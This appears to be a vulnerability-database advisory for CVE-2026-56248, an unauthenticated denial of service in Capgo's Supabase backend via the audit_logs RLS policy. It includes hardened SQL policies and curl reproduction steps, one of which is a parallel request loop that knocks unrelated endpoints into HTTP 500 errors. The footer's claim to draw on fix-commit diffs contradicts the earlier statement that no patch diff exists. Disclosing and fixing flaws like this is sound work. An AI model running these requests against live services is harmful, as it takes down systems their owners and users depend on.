VYPR
Unrated severity · NVD Advisory · Published Jun 23, 2026 · Updated Jun 23, 2026

Capgo - Unauthenticated Denial-of-Service via audit_logs RLS Policy

CVE-2026-56248

Description

Cap-go capgo (capgo-backend) before 12.128.12 contains an unauthenticated denial-of-service vulnerability arising from the audit_logs table's Row-Level Security (RLS) policy when accessed via the Supabase PostgREST API. Because the PostgreSQL query planner executes costly logic before RLS rejection, unfiltered queries to the public.audit_logs endpoint using the public anon key consistently trigger statement timeouts (PostgREST error 57014). Under concurrency, this exhausts database resources and causes cascading HTTP 500 failures on unrelated endpoints (e.g. /orgs), resulting in an application-layer denial of service.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.


Vulnerability mechanics

Root cause

"The PostgreSQL query planner executes costly logic before the RLS policy rejects unauthorized access to the audit_logs table, allowing unauthenticated queries to trigger statement timeouts."

Attack vector

An unauthenticated attacker sends unfiltered queries (e.g. `?select=id&limit=1`) to the `/rest/v1/audit_logs` endpoint using the publicly exposed Supabase anon key. The PostgreSQL query planner executes costly logic before the RLS policy rejects the request, causing a statement timeout (error 57014). Under concurrency, this exhausts database resources and causes unrelated endpoints (e.g. `/orgs`) to return HTTP 500 errors, resulting in application-layer denial of service [ref_id=1].

Affected code

The `public.audit_logs` table and its Row-Level Security (RLS) policy, accessed via the Supabase PostgREST API endpoint `/rest/v1/audit_logs`.

What the fix does

The advisory does not include a patch diff. The recommended remediation is to revise the RLS policy on `public.audit_logs` so that the query planner rejects unauthorized access before executing expensive logic, or to remove public access to the endpoint entirely [ref_id=1].
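To make the two remediation options concrete, the following PostgreSQL/Supabase SQL contrasts a policy shape that lets an unauthenticated caller drive a full scan with one that denies the anon role before any row is evaluated. This is an added illustration written for this page, not Capgo's actual schema, policy, or fix: the `org_users` membership table, the policy names, and the index are assumptions; the only column taken from the advisory is `org_id`, which the control request in the reproduction filters on. The Supabase roles `anon` and `authenticated` and the `auth.uid()` helper are real.

```sql
-- Hypothetical illustration, not Capgo's real policy. Assumed schema:
--   public.audit_logs(id, org_id uuid, ...)         -- org_id from the advisory
--   public.org_users(org_id uuid, user_id uuid)     -- assumed membership table

-- BEFORE (weak): the policy is granted to every role, anon included, and its
-- USING clause is a correlated membership check. An unfiltered PostgREST
-- request (no org_id restriction) becomes a scan of audit_logs that evaluates
-- the subquery for each candidate row. auth.uid() is NULL for anon, so no row
-- can ever match, but PostgreSQL only discovers that by doing the work, or by
-- cancelling it when statement_timeout fires (SQLSTATE 57014).
ALTER TABLE public.audit_logs ENABLE ROW LEVEL SECURITY;
GRANT SELECT ON public.audit_logs TO anon, authenticated;
CREATE POLICY audit_logs_read_weak ON public.audit_logs
  FOR SELECT TO public
  USING (
    EXISTS (SELECT 1 FROM public.org_users ou
            WHERE ou.org_id = audit_logs.org_id
              AND ou.user_id = auth.uid())
  );

-- AFTER (hardened)
-- 1. Remove the anon role's table privilege. PostgREST then answers the
--    unauthenticated request with a permission error (SQLSTATE 42501) before
--    any query plan touches the table: the "remove public access" option.
DROP POLICY IF EXISTS audit_logs_read_weak ON public.audit_logs;
REVOKE SELECT ON public.audit_logs FROM anon;

-- 2. Name only the authenticated role in the remaining policy. For a role the
--    policy does not cover, RLS falls back to default-deny (no rows visible),
--    so the membership subquery is never evaluated for that role.
CREATE POLICY audit_logs_read_members ON public.audit_logs
  FOR SELECT TO authenticated
  USING (
    org_id IN (SELECT ou.org_id FROM public.org_users ou
               WHERE ou.user_id = auth.uid())
  );

-- 3. Keep the policy predicate index-friendly so an authenticated caller that
--    omits a filter still cannot force a sequential scan of the whole table.
CREATE INDEX IF NOT EXISTS audit_logs_org_id_idx ON public.audit_logs (org_id);

-- Post-change checks (run in a SQL session against the database):
--   SET ROLE anon;
--   SELECT id FROM public.audit_logs LIMIT 1;
--   -- expected: ERROR: permission denied for table audit_logs, returned
--   -- immediately rather than after a statement timeout
--   RESET ROLE;
--   EXPLAIN SELECT id FROM public.audit_logs WHERE org_id = '<some org uuid>';
--   -- expected: the plan uses audit_logs_org_id_idx
```

The design point is ordering: a privilege check and a role-scoped policy are decided before planning or at plan time, whereas a `USING` expression is part of the query and runs against rows. Anything expensive that must stay inside `USING` should be reachable through an index on the column the policy filters on, otherwise an unfiltered request from any permitted role remains a scan.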

Preconditions

  • config: Attacker must know the Supabase project URL and the publicly exposed anon key
  • auth: No authentication required; the anon key is publicly available
  • network: Attacker must be able to send HTTP requests to the PostgREST API
  • input: Unfiltered query (no restrictive WHERE clause) to the audit_logs endpoint

Reproduction

**Step 1 – Trigger timeout with a single unauthenticated request**

```
curl -sk -i \
  "$SUPA_URL/rest/v1/audit_logs?select=id&limit=1" \
  -H "apikey: $SUPA_ANON" \
  -H "Authorization: Bearer $SUPA_ANON"
```

Result: HTTP 500 with `{"message":"canceling statement due to statement timeout"}`.

**Step 2 – Filtered request (control case)**

```
curl -sk -o /dev/null -w 'HTTP=%{http_code} time=%{time_total}\n' \
  "$SUPA_URL/rest/v1/audit_logs?select=id&limit=1&org_id=eq.00000000-0000-0000-0000-000000000000" \
  -H "apikey: $SUPA_ANON" \
  -H "Authorization: Bearer $SUPA_ANON"
```

Result: HTTP 200 (fast response).

**Step 3 – Cascading failure (DoS amplification)**

```
( seq 8 | xargs -P 8 -I{} sh -c \
    'curl -sk "$SUPA_URL/rest/v1/audit_logs?select=id&limit=1" \
       -H "apikey: $SUPA_ANON" -H "Authorization: Bearer $SUPA_ANON" >/dev/null' ) &
sleep 0.2
curl -sk -o /dev/null -w 'HTTP=%{http_code} time=%{time_total}\n' \
  "$SUPA_URL/rest/v1/orgs?select=id&limit=1" \
  -H "apikey: $SUPA_ANON" \
  -H "Authorization: Bearer $SUPA_ANON"
```

Observed: HTTP 500 on the `/orgs` endpoint.

Generated on Jun 24, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
